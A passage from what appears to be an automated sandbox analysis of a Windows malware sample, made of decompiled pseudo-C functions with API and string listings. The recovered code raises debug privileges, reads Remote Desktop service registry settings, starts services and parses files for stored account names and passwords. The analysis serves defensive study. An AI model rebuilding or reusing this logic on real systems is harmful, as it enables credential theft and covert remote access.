						_t79 = E0043BDDC(_t202);
						__eflags = _t79;
						if(_t79 != 0) {
							_t160 = _t202;
							_t80 = E0043BD37(_t202, _t199, _t159);
							__eflags = _t80;
							if(_t80 != 0) {
								E0043BFB7(_t160);
								_t82 = E00433412( &_v52, L"SeDebugPrivilege");
								_t83 = GetCurrentProcess();
								_t200 = _t82;
								_t84 = E0043D609(_t83, _t82);
								E00435A2D(_v56);
								__eflags = _t84;
								if(_t84 != 0) {
									_t164 =  *(_t202 + 0x2c);
									_t86 = E0043EC94( *(_t202 + 0x2c));
									__eflags = _t86;
									if(_t86 != 0) {
										Sleep(0x3e8);
										_t87 =  *(_t202 + 0x48);
										__eflags = _t87;
										if(_t87 != 0) {
											_t211 = _t154;
											__eflags = _t211 - _t87;
											do {
												E0043582B(_t164 & 0xffffff00 | __eflags > 0x00000000);
												E0043345A( &_v52,  *((intOrPtr*)(_t202 + 0x40)) + _t211 * 4);
												E0043B889( &_v56);
												_t164 = _v60;
												E00435A2D(_v60);
												_t211 = _t211 + 1;
												_v60 = _t154;
												__eflags = _t211 -  *(_t202 + 0x48);
											} while (_t211 <  *(_t202 + 0x48));
										}
										Sleep(0x1f4);
										E0043345A( &_v52, _t202 + 0x28);
										E0043B889( &_v56);
										_t166 = _v60;
										E00435A2D(_v60);
										Sleep(0x1f4);
										_t93 = E0043B9BC(_t200, __eflags, _v60);
										__eflags = _t93;
										if(_t93 != 0) {
											_t94 = E0043DBF3(_t166);
											__eflags = _t94 - 1;
											if(_t94 == 1) {
												E0043D5B4(_v56);
											}
											E00434B53( *((intOrPtr*)(_t202 + 0x60)), E004347F1( &_v52, _t154, _t202 + 0x58, _t202 + 0x5c));
											E004347CE( &_v68);
											LeaveCriticalSection(_t202);
											_t154 = 8;
										} else {
											_push(_t202 + 0x5c);
											_push(_t202 + 0x58);
											_push(7);
											goto L31;
										}
									} else {
										E0043D5B4(_v56);
										_push(_t202 + 0x5c);
										_push(_t202 + 0x58);
										_push(5);
										goto L31;
									}
								} else {
									E0043D5B4(_v56);
									_push(_t202 + 0x5c);
									_push(_t202 + 0x58);
									_push(3);
									goto L31;
								}
							} else {
								E0043D5B4(_v56);
								_push(_t202 + 0x5c);
								_push(_t202 + 0x58);
								_push(6);
								goto L31;
							}
						} else {
							E0043D5B4(_v56);
							_push(_t202 + 0x5c);
							_push(_t202 + 0x58);
							_push(4);
							L31:
							E00434B53( *((intOrPtr*)(_t202 + 0x60)), E004347F1( &_v52));
							E004347CE( &_v68);
							LeaveCriticalSection(_t202);
						}
					} else {
						E0043345A(_t215, _t206);
						E0043E1A1( &_v32, __eflags, _t156, _t154);
						_t183 =  *((intOrPtr*)(_t202 + 0x54));
						E0044146E( *((intOrPtr*)(_t202 + 0x54)), _t199,  &_v64,  *((intOrPtr*)(_t202 + 0x60)), 3);
						__eflags = _v76 - _t154;
						if(_v76 != _t154) {
							_t184 =  &_v28;
							_t132 = E0043DD8E(_t184, _t183, _t183);
							__eflags = _t132;
							if(_t132 != 0) {
								_push(_t184);
								E0043E0DB( &_v28,  &_v52);
								E0043E0C3( &_v36);
							}
							E00432E66( &_v52);
							E0043DE8B( &_v28, __eflags);
							goto L17;
						} else {
							E00432E66( &_v52);
							goto L7;
						}
					}
				} else {
					E0043345A(_t215, _t205);
					E0043E1A1( &_v32, _t217, _t156, _t154);
					_t142 = E0043DBF3( &_v32);
					_t193 =  *((intOrPtr*)(_t202 + 0x54));
					_t143 =  &_v64;
					if(_t142 != 1) {
						_push(1);
					} else {
						_push(2);
					}
					_push( *((intOrPtr*)(_t202 + 0x60)));
					_push(_t143);
					E00432CCC( &_v48, E0044146E(_t193, _t199));
					_t195 =  &_v68;
					E00432E66( &_v68);
					_t219 = _v52 - _t154;
					if(_v52 != _t154) {
						_t196 =  &_v28;
						__eflags = E0043DD8E(_t196,  &_v68, _t195);
						if(__eflags != 0) {
							_push(_t196);
							E0043E0DB( &_v28,  &_v36);
							E0043E0C3( &_v36);
						}
						_t156 =  &_v28;
						E0043DE8B( &_v28, __eflags);
						goto L11;
					} else {
						L7:
						E0043DE8B( &_v28, _t219);
						_t154 = _t154 | 0xffffffff;
					}
				}
				E00432E66( &_v36);
				return _t154;
			}




































                                      0x0043c253
                                      0x0043c253
                                      0x0043c259
                                      0x0043c25f
                                      0x0043c261
                                      0x0043c264
                                      0x0043c268
                                      0x0043c26c
                                      0x0043c270
                                      0x0043c27e
                                      0x0043c280
                                      0x0043c284
                                      0x0043c284
                                      0x0043c289
                                      0x0043c28e
                                      0x0043c294
                                      0x0043c296
                                      0x0043c329
                                      0x0043c329
                                      0x0043c32e
                                      0x0043c334
                                      0x0043c336
                                      0x0043c3aa
                                      0x0043c3ac
                                      0x0043c3b3
                                      0x0043c3b8
                                      0x0043c3ba
                                      0x0043c3bf
                                      0x0043c3c1
                                      0x0043c3dc
                                      0x0043c3de
                                      0x0043c3e3
                                      0x0043c3e5
                                      0x0043c3ff
                                      0x0043c40d
                                      0x0043c414
                                      0x0043c41a
                                      0x0043c41e
                                      0x0043c429
                                      0x0043c42e
                                      0x0043c430
                                      0x0043c44a
                                      0x0043c44d
                                      0x0043c452
                                      0x0043c454
                                      0x0043c479
                                      0x0043c47b
                                      0x0043c47e
                                      0x0043c480
                                      0x0043c482
                                      0x0043c484
                                      0x0043c486
                                      0x0043c489
                                      0x0043c499
                                      0x0043c4a3
                                      0x0043c4a8
                                      0x0043c4ac
                                      0x0043c4b4
                                      0x0043c4b5
                                      0x0043c4b9
                                      0x0043c4b9
                                      0x0043c4bd
                                      0x0043c4c8
                                      0x0043c4d2
                                      0x0043c4dc
                                      0x0043c4e1
                                      0x0043c4e5
                                      0x0043c4ef
                                      0x0043c4f2
                                      0x0043c4f7
                                      0x0043c4f9
                                      0x0043c529
                                      0x0043c52e
                                      0x0043c531
                                      0x0043c537
                                      0x0043c537
                                      0x0043c552
                                      0x0043c55b
                                      0x0043c561
                                      0x0043c569
                                      0x0043c4fb
                                      0x0043c4fe
                                      0x0043c502
                                      0x0043c503
                                      0x00000000
                                      0x0043c503
                                      0x0043c456
                                      0x0043c45a
                                      0x0043c462
                                      0x0043c466
                                      0x0043c467
                                      0x00000000
                                      0x0043c467
                                      0x0043c432
                                      0x0043c436
                                      0x0043c43e
                                      0x0043c442
                                      0x0043c443
                                      0x00000000
                                      0x0043c443
                                      0x0043c3e7
                                      0x0043c3eb
                                      0x0043c3f3
                                      0x0043c3f7
                                      0x0043c3f8
                                      0x00000000
                                      0x0043c3f8
                                      0x0043c3c3
                                      0x0043c3c7
                                      0x0043c3cf
                                      0x0043c3d3
                                      0x0043c3d4
                                      0x0043c505
                                      0x0043c512
                                      0x0043c51b
                                      0x0043c521
                                      0x0043c521
                                      0x0043c338
                                      0x0043c33d
                                      0x0043c346
                                      0x0043c34b
                                      0x0043c358
                                      0x0043c35d
                                      0x0043c361
                                      0x0043c373
                                      0x0043c377
                                      0x0043c37c
                                      0x0043c37e
                                      0x0043c380
                                      0x0043c38a
                                      0x0043c393
                                      0x0043c393
                                      0x0043c39c
                                      0x0043c3a5
                                      0x00000000
                                      0x0043c363
                                      0x0043c367
                                      0x00000000
                                      0x0043c367
                                      0x0043c361
                                      0x0043c29c
                                      0x0043c2a1
                                      0x0043c2aa
                                      0x0043c2af
                                      0x0043c2b4
                                      0x0043c2ba
                                      0x0043c2be
                                      0x0043c2c4
                                      0x0043c2c0
                                      0x0043c2c0
                                      0x0043c2c0
                                      0x0043c2c6
                                      0x0043c2c9
                                      0x0043c2d4
                                      0x0043c2d9
                                      0x0043c2dd
                                      0x0043c2e2
                                      0x0043c2e6
                                      0x0043c2fb
                                      0x0043c304
                                      0x0043c306
                                      0x0043c308
                                      0x0043c312
                                      0x0043c31b
                                      0x0043c31b
                                      0x0043c320
                                      0x0043c324
                                      0x00000000
                                      0x0043c2e8
                                      0x0043c2e8
                                      0x0043c2ec
                                      0x0043c2f1
                                      0x0043c2f1
                                      0x0043c2e6
                                      0x0043c56e
                                      0x0043c57b

                                      APIs
                                      • EnterCriticalSection.KERNEL32 ref: 0043C270
                                        • Part of subcall function 0043DBF3: GetCurrentProcess.KERNEL32(?,?,00432BBD,?,00442608,?,?,00000000,?,?,?), ref: 0043DBF7
                                      • PathFileExistsW.SHLWAPI(?), ref: 0043C32E
                                      • PathFileExistsW.SHLWAPI(?), ref: 0043C28E
                                        • Part of subcall function 0043DD8E: CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000001,00000000,00000000), ref: 0043DDA5
                                        • Part of subcall function 0043DD8E: GetLastError.KERNEL32(?,?,?,00438715,?,?,?), ref: 0043DDB3
                                      • LeaveCriticalSection.KERNEL32(?,00000000), ref: 0043C521
                                        • Part of subcall function 0043BD37: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000102,?,SYSTEM\CurrentControlSet\Services\TermService\Parameters), ref: 0043BD6B
                                      • GetCurrentProcess.KERNEL32(SeDebugPrivilege), ref: 0043C414
                                      • LeaveCriticalSection.KERNEL32(?,00000000), ref: 0043C561
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CriticalFileSection$CurrentExistsLeavePathProcess$CreateEnterErrorLastOpen
                                      • String ID: SeDebugPrivilege
                                      • API String ID: 1717069549-2896544425
                                      • Opcode ID: 159dcffcbe95a75f28a8f3b731b6dfe39667b667e1ace2084f2b51e8fa40d3ff
                                      • Instruction ID: 262d24cc0eab0ce5121a57b3a987b939ebcdac3cfa305bec0a34172509e949f2
                                      • Opcode Fuzzy Hash: 159dcffcbe95a75f28a8f3b731b6dfe39667b667e1ace2084f2b51e8fa40d3ff
                                      • Instruction Fuzzy Hash: 2D915271504205ABD705FF62DC92DAFB3A8BF9C308F40252FF55292191DB68E909CB9A
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 0043C033, Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 111registryUNIQUE
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0043C033(void* __ecx, void* __edx) {
				void* _v8;
				WCHAR* _v12;
				signed int _v16;
				short* _v20;
				short* _v24;
				char _v28;
				int _v32;
				char _v36;
				void* _t50;
				void* _t62;
				void* _t72;
				void* _t96;

				_t96 = __edx;
				_t72 = __ecx;
				_v8 = 0;
				E00433412( &_v24, L"SYSTEM\\CurrentControlSet\\Services\\TermService");
				E00433412( &_v20, L"SYSTEM\\CurrentControlSet\\Services\\TermService\\Parameters");
				_v36 = 0;
				_v32 = 0;
				if(RegOpenKeyExW(0x80000002, _v24, 0, 0x20119,  &_v8) == 0) {
					_t50 = E0043EF61( &_v8, _t96, E00433412( &_v16, L"ImagePath"),  &_v36);
					E00435A2D(_v16);
					E0043EF4C( &_v8);
					_t103 = _t50;
					if(_t50 != 0) {
						E00432D08( &_v36, _t103,  &_v12);
						E00432DF3( &_v36);
						if(StrStrW(_v12, L"svchost.exe") != 0 || StrStrW(_v12, L"svchost.exe -k") != 0) {
							if(RegOpenKeyExW(0x80000002, _v20, 0, 0x20119,  &_v8) == 0) {
								_t62 = E0043EF61( &_v8, _t96, E00433412( &_v16, L"ServiceDll"),  &_v36);
								E00435A2D(_v16);
								_t107 = _t62;
								if(_t62 != 0) {
									E00433264(_t72 + 0x20, E00433001( &_v16, E00432D08( &_v36, _t107,  &_v28), _t107));
									E00435A2D(_v16);
									_v16 = _v16 & 0x00000000;
									E00435A2D(_v28);
								}
								E0043EF4C( &_v8);
							}
						}
						E00435A2D(_v12);
						_v12 = _v12 & 0x00000000;
					}
				}
				E00432E66( &_v36);
				E00435A2D(_v20);
				E00435A2D(_v24);
				return E0043EF4C( &_v8);
			}















                                      0x0043c033
                                      0x0043c03b
                                      0x0043c047
                                      0x0043c04a
                                      0x0043c057
                                      0x0043c05f
                                      0x0043c06c
                                      0x0043c07c
                                      0x0043c097
                                      0x0043c0a1
                                      0x0043c0a9
                                      0x0043c0ae
                                      0x0043c0b0
                                      0x0043c0bd
                                      0x0043c0c5
                                      0x0043c0dc
                                      0x0043c10b
                                      0x0043c122
                                      0x0043c12c
                                      0x0043c131
                                      0x0043c133
                                      0x0043c14f
                                      0x0043c157
                                      0x0043c15f
                                      0x0043c163
                                      0x0043c163
                                      0x0043c16b
                                      0x0043c16b
                                      0x0043c10b
                                      0x0043c173
                                      0x0043c178
                                      0x0043c178
                                      0x0043c0b0
                                      0x0043c17f
                                      0x0043c187
                                      0x0043c18f
                                      0x0043c19f

                                      APIs
                                        • Part of subcall function 00433412: lstrlenW.KERNEL32(0043FC61,00000000,?,0043FC61,00000000,?,00000000), ref: 0043341B
                                        • Part of subcall function 00433412: lstrlenW.KERNEL32(0043FC61,?,0043FC61,00000000,?,00000000), ref: 00433432
                                        • Part of subcall function 00433412: lstrcpyW.KERNEL32(?,0043FC61), ref: 0043344D
                                      • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020119,?,SYSTEM\CurrentControlSet\Services\TermService\Parameters,SYSTEM\CurrentControlSet\Services\TermService), ref: 0043C074
                                        • Part of subcall function 0043EF61: RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,00000000,?,00000000,?,?,?,?,0043F3B9,?,0000000A,80000001), ref: 0043EF84
                                        • Part of subcall function 0043EF61: RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,00000000,?,0043F3B9,?,0000000A,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows\CurrentVersion\Run\), ref: 0043EFA7
                                        • Part of subcall function 00435A2D: VirtualFree.KERNELBASE(00000000,00000000,00008000,0043E2AE,?,?,?,?,?,00000000), ref: 00435A35
                                        • Part of subcall function 0043EF4C: RegCloseKey.ADVAPI32(?,?,0043F043,?,0043F392,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows\CurrentVersion\Run\,00000000,InitWindows,00000000,inst,?), ref: 0043EF56
                                      • StrStrW.SHLWAPI(?,svchost.exe), ref: 0043C0D8
                                      • StrStrW.SHLWAPI(?,svchost.exe -k), ref: 0043C0E6
                                      • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020119,?), ref: 0043C103
                                      Strings
                                      • SYSTEM\CurrentControlSet\Services\TermService, xrefs: 0043C03F
                                      • ImagePath, xrefs: 0043C086
                                      • ServiceDll, xrefs: 0043C111
                                      • svchost.exe -k, xrefs: 0043C0DE
                                      • SYSTEM\CurrentControlSet\Services\TermService\Parameters, xrefs: 0043C04F
                                      • svchost.exe, xrefs: 0043C0D0
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: OpenQueryValuelstrlen$CloseFreeVirtuallstrcpy
                                      • String ID: ImagePath$SYSTEM\CurrentControlSet\Services\TermService$SYSTEM\CurrentControlSet\Services\TermService\Parameters$ServiceDll$svchost.exe$svchost.exe -k
                                      • API String ID: 2246401353-3333427388
                                      • Opcode ID: 917052dcec4ed8a73080977068f02011d923592ec58fc08fd87e55eed1be189e
                                      • Instruction ID: f3b52ece0c05f811827ad19d4e8af4e78ff1b780f453cb3f31f5c0b3daa028e2
                                      • Opcode Fuzzy Hash: 917052dcec4ed8a73080977068f02011d923592ec58fc08fd87e55eed1be189e
                                      • Instruction Fuzzy Hash: B5415E71D00118BBDF14EFA2DD92AEEB778AF18705F10516AB501B21A2EB785F04DB98
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 0043B889, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 55servicesleepUNIQUE
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0043B889(short** _a4) {
				void* _t2;
				int _t8;
				void* _t13;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t2 = OpenSCManagerW(0, L"ServicesActive", 1);
				_t17 = _t2;
				if(_t17 != 0) {
					_t13 = OpenServiceW(_t17,  *_a4, 0x10);
					if(_t13 != 0) {
						if(StartServiceW(_t13, 0, 0) != 0) {
							L6:
							_t15 = 1;
							L7:
							CloseServiceHandle(_t17);
							CloseServiceHandle(_t13);
							_t8 = _t15;
							L8:
							return _t8;
						}
						if(GetLastError() != 0x420) {
							goto L7;
						}
						Sleep(0x7d0);
						if(StartServiceW(_t13, 0, 0) == 0) {
							goto L7;
						}
						goto L6;
					}
					CloseServiceHandle(_t17);
					_t8 = 0;
					goto L8;
				}
				return _t2;
			}








                                      0x0043b895
                                      0x0043b898
                                      0x0043b89e
                                      0x0043b8a2
                                      0x0043b8b3
                                      0x0043b8b7
                                      0x0043b8cf
                                      0x0043b8f6
                                      0x0043b8f8
                                      0x0043b8f9
                                      0x0043b900
                                      0x0043b903
                                      0x0043b905
                                      0x0043b907
                                      0x00000000
                                      0x0043b907
                                      0x0043b8dc
                                      0x00000000
                                      0x00000000
                                      0x0043b8e3
                                      0x0043b8f4
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x0043b8f4
                                      0x0043b8ba
                                      0x0043b8c0
                                      0x00000000
                                      0x0043b8c0
                                      0x0043b90b

                                      APIs
                                      • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001), ref: 0043B898
                                      • OpenServiceW.ADVAPI32(00000000,?,00000010), ref: 0043B8AD
                                      • CloseServiceHandle.ADVAPI32(00000000), ref: 0043B8BA
                                      • StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 0043B8C7
                                      • GetLastError.KERNEL32 ref: 0043B8D1
                                      • Sleep.KERNEL32(000007D0), ref: 0043B8E3
                                      • StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 0043B8EC
                                      • CloseServiceHandle.ADVAPI32(00000000), ref: 0043B900
                                      • CloseServiceHandle.ADVAPI32(00000000), ref: 0043B903
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Service$CloseHandle$OpenStart$ErrorLastManagerSleep
                                      • String ID: ServicesActive
                                      • API String ID: 104619213-3071072050
                                      • Opcode ID: 1bb9bee44d4bb98d7e731547fa4d10bc11bdf62a352061a982a8b90ad434c243
                                      • Instruction ID: 148525303a5555431b5f00f8c58d608aace881056db08435528ddb96ea91cbf1
                                      • Opcode Fuzzy Hash: 1bb9bee44d4bb98d7e731547fa4d10bc11bdf62a352061a982a8b90ad434c243
                                      • Instruction Fuzzy Hash: D1018F753016147BD3252B66AE4DF5B3EACDFCAB61F401032F702D6251DBA8C801C6B8
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 0043878B, Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 226fileUNIQUE
                                      Download Yara Rule
                                      C-Code - Quality: 97%
                                      			E0043878B(intOrPtr __ecx, CHAR* _a4) {
				char _v12;
				long _v16;
				void* _v20;
				long _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				char _v48;
				char _v52;
				char _t96;
				void* _t101;
				char _t103;
				void* _t124;
				intOrPtr _t126;
				char _t127;
				long _t132;
				void* _t134;
				void* _t141;
				void* _t145;
				void* _t146;
				intOrPtr* _t163;
				intOrPtr* _t165;
				void* _t166;
				void* _t167;
				void* _t168;
				void* _t170;
				intOrPtr _t171;
				intOrPtr* _t172;
				void* _t173;
				intOrPtr _t174;
				intOrPtr* _t176;
				CHAR* _t177;
				void* _t178;
				void* _t179;

				_v36 = __ecx;
				_t173 = CreateFileA(_a4, 0x80000000, 7, 0, 3, 0, 0);
				if(_t173 != 0xffffffff) {
					_t132 = GetFileSize(_t173, 0);
					_v16 = _t132;
					_t170 = E00435ADB(_t132);
					_v32 = _t170;
					E00431052(_t170, 0, _t132);
					_v24 = _v24 & 0x00000000;
					_t179 = _t178 + 0xc;
					ReadFile(_t173, _t170, _t132,  &_v24, 0);
					CloseHandle(_t173);
					_t174 = E00435A3C(0x400000);
					_v28 = _t174;
					_a4 = E00435A3C(0x104);
					_t96 = E00435A3C(0x104);
					_t141 = 0;
					_v12 = _t96;
					_t134 = 0;
					__eflags = _v16;
					if(_v16 <= 0) {
						L36:
						E00435A2D(_a4);
						E00435A2D(_v12);
						return E00435A2D(_t174);
					} else {
						goto L3;
					}
					do {
						L3:
						_t165 =  *((intOrPtr*)(_t134 + _t170));
						_t13 = _t165 - 0x21; // -33
						__eflags = _t13 - 0x5d;
						if(_t13 > 0x5d) {
							goto L28;
						}
						__eflags = _t165 - 0x3d;
						if(_t165 == 0x3d) {
							goto L28;
						}
						 *((char*)(_t141 + _t174)) = _t165;
						_t141 = _t141 + 1;
						__eflags = _t165;
						if(_t165 != 0) {
							__eflags =  *((char*)(_t141 + _t174 - 8)) - 0x50;
							if( *((char*)(_t141 + _t174 - 8)) != 0x50) {
								goto L28;
							}
							__eflags =  *((char*)(_t141 + _t174 - 7)) - 0x61;
							if( *((char*)(_t141 + _t174 - 7)) != 0x61) {
								goto L28;
							}
							__eflags =  *((char*)(_t141 + _t174 - 6)) - 0x73;
							if( *((char*)(_t141 + _t174 - 6)) != 0x73) {
								goto L28;
							}
							__eflags =  *((char*)(_t141 + _t174 - 5)) - 0x73;
							if( *((char*)(_t141 + _t174 - 5)) != 0x73) {
								goto L28;
							}
							__eflags =  *((char*)(_t141 + _t174 - 4)) - 0x77;
							if( *((char*)(_t141 + _t174 - 4)) != 0x77) {
								goto L28;
							}
							__eflags =  *((char*)(_t141 + _t174 - 3)) - 0x6f;
							if( *((char*)(_t141 + _t174 - 3)) != 0x6f) {
								goto L28;
							}
							__eflags =  *((char*)(_t141 + _t174 - 2)) - 0x72;
							if( *((char*)(_t141 + _t174 - 2)) != 0x72) {
								goto L28;
							}
							__eflags =  *((char*)(_t141 + _t174 - 1)) - 0x64;
							if( *((char*)(_t141 + _t174 - 1)) == 0x64) {
								__eflags =  *_t170 - 0xd0;
								_t101 = 2;
								_t145 = 9;
								_t102 =  !=  ? _t145 : _t101;
								_t146 = ( !=  ? _t145 : _t101) + _t134;
								_t103 =  *((intOrPtr*)(_t146 + _t170));
								_t166 = 0;
								__eflags = _t103 - 0x20;
								if(_t103 <= 0x20) {
									L35:
									_t60 =  &_v12; // 0x50
									_v52 = 0;
									_v48 = 0;
									 *((char*)(_t166 +  *_t60)) = 0;
									_v44 = 0;
									E004331EC( &_v20,  *_t60);
									_t66 =  &_a4; // 0x50
									E004331EC( &_v16,  *_t66);
									E00433264( &_v44, E00432ECA( &_v20, __eflags,  &_v32));
									E00435A2D(_v32);
									E00433264( &_v48, E00432ECA( &_v16, __eflags,  &_v32));
									E00435A2D(_v32);
									_v40 = 5;
									E00433264( &_v52, E00433412( &_v32, 0x442608));
									E00435A2D(_v32);
									E00431EB9(_t179 - 0x10,  &_v52);
									E00431EEF(_v36);
									E00435A2D(_v16);
									E00435A2D(_v20);
									E0043138F( &_v52);
									goto L36;
								}
								_t163 = _t146 + _t170;
								__eflags = _t163;
								_t58 =  &_v12; // 0x50
								_t171 =  *_t58;
								while(1) {
									__eflags = _t103 - 0x7f;
									if(_t103 >= 0x7f) {
										goto L35;
									}
									__eflags = _t103 - 0x21;
									if(_t103 == 0x21) {
										goto L35;
									}
									 *((char*)(_t166 + _t171)) = _t103;
									_t166 = _t166 + 1;
									_t163 = _t163 + 1;
									_t103 =  *_t163;
									__eflags = _t103 - 0x20;
									if(_t103 > 0x20) {
										continue;
									}
									goto L35;
								}
								goto L35;
							}
							goto L28;
						}
						__eflags = _t141 - 7;
						if(_t141 <= 7) {
							goto L28;
						}
						__eflags =  *((char*)(_t141 + _t174 - 7)) - 0x41;
						if( *((char*)(_t141 + _t174 - 7)) != 0x41) {
							goto L28;
						}
						__eflags =  *((char*)(_t141 + _t174 - 6)) - 0x63;
						if( *((char*)(_t141 + _t174 - 6)) != 0x63) {
							goto L28;
						}
						__eflags =  *((char*)(_t141 + _t174 - 5)) - 0x63;
						if( *((char*)(_t141 + _t174 - 5)) != 0x63) {
							goto L28;
						}
						__eflags =  *((char*)(_t141 + _t174 - 4)) - 0x6f;
						if( *((char*)(_t141 + _t174 - 4)) != 0x6f) {
							goto L28;
						}
						__eflags =  *((char*)(_t141 + _t174 - 3)) - 0x75;
						if( *((char*)(_t141 + _t174 - 3)) != 0x75) {
							goto L28;
						}
						__eflags =  *((char*)(_t141 + _t174 - 2)) - 0x6e;
						if( *((char*)(_t141 + _t174 - 2)) != 0x6e) {
							goto L28;
						}
						__eflags =  *((char*)(_t141 + _t174 - 1)) - 0x74;
						if( *((char*)(_t141 + _t174 - 1)) != 0x74) {
							goto L28;
						}
						__eflags =  *_t170 - 0xd0;
						_t124 = 2;
						_t167 = 9;
						_t125 =  !=  ? _t167 : _t124;
						_t168 = 0;
						_t126 = ( !=  ? _t167 : _t124) + _t134;
						_v20 = _t126;
						_t127 =  *((intOrPtr*)(_t126 + _t170));
						__eflags = _t127 - 0x20;
						if(_t127 <= 0x20) {
							L19:
							 *((char*)(_t168 + _a4)) = 0;
							goto L28;
						}
						_t176 = _v20 + _t170;
						__eflags = _t176;
						_v20 = _t176;
						_t172 = _t176;
						_t177 = _a4;
						while(1) {
							__eflags = _t127 - 0x7f;
							if(_t127 >= 0x7f) {
								break;
							}
							_t172 = _t172 + 1;
							 *((char*)(_t168 + _t177)) = _t127;
							_t168 = _t168 + 1;
							_t127 =  *_t172;
							__eflags = _t127 - 0x20;
							if(_t127 > 0x20) {
								continue;
							}
							break;
						}
						_t174 = _v28;
						_t170 = _v32;
						goto L19;
						L28:
						_t134 = _t134 + 1;
						__eflags = _t134 - _v16;
					} while (_t134 < _v16);
					goto L36;
				}
				GetLastError();
				return CloseHandle(_t173);
			}







































                                      0x00438796
                                      0x004387ae
                                      0x004387b3
                                      0x004387cf
                                      0x004387d3
                                      0x004387dc
                                      0x004387e1
                                      0x004387e4
                                      0x004387e9
                                      0x004387f0
                                      0x004387f9
                                      0x00438800
                                      0x00438810
                                      0x00438819
                                      0x00438823
                                      0x00438826
                                      0x0043882b
                                      0x0043882d
                                      0x00438832
                                      0x00438834
                                      0x00438837
                                      0x00438a22
                                      0x00438a25
                                      0x00438a2d
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x0043883d
                                      0x0043883d
                                      0x0043883d
                                      0x00438840
                                      0x00438843
                                      0x00438845
                                      0x00000000
                                      0x00000000
                                      0x0043884b
                                      0x0043884e
                                      0x00000000
                                      0x00000000
                                      0x00438854
                                      0x00438857
                                      0x00438858
                                      0x0043885a
                                      0x004388f9
                                      0x004388fe
                                      0x00000000
                                      0x00000000
                                      0x00438900
                                      0x00438905
                                      0x00000000
                                      0x00000000
                                      0x00438907
                                      0x0043890c
                                      0x00000000
                                      0x00000000
                                      0x0043890e
                                      0x00438913
                                      0x00000000
                                      0x00000000
                                      0x00438915
                                      0x0043891a
                                      0x00000000
                                      0x00000000
                                      0x0043891c
                                      0x00438921
                                      0x00000000
                                      0x00000000
                                      0x00438923
                                      0x00438928
                                      0x00000000
                                      0x00000000
                                      0x0043892a
                                      0x0043892f
                                      0x00438940
                                      0x00438945
                                      0x00438948
                                      0x00438949
                                      0x0043894c
                                      0x00438951
                                      0x00438954
                                      0x00438956
                                      0x00438958
                                      0x00438972
                                      0x00438972
                                      0x00438979
                                      0x0043897c
                                      0x0043897f
                                      0x00438982
                                      0x00438985
                                      0x0043898a
                                      0x00438990
                                      0x004389a5
                                      0x004389ad
                                      0x004389c2
                                      0x004389ca
                                      0x004389d7
                                      0x004389e7
                                      0x004389ef
                                      0x004389fd
                                      0x00438a05
                                      0x00438a0d
                                      0x00438a15
                                      0x00438a1d
                                      0x00000000
                                      0x00438a1d
                                      0x0043895a
                                      0x0043895a
                                      0x0043895c
                                      0x0043895c
                                      0x0043895f
                                      0x0043895f
                                      0x00438961
                                      0x00000000
                                      0x00000000
                                      0x00438963
                                      0x00438965
                                      0x00000000
                                      0x00000000
                                      0x00438967
                                      0x0043896a
                                      0x0043896b
                                      0x0043896c
                                      0x0043896e
                                      0x00438970
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00438970
                                      0x00000000
                                      0x0043895f
                                      0x00000000
                                      0x0043892f
                                      0x00438860
                                      0x00438863
                                      0x00000000
                                      0x00000000
                                      0x00438869
                                      0x0043886e
                                      0x00000000
                                      0x00000000
                                      0x00438874
                                      0x00438879
                                      0x00000000
                                      0x00000000
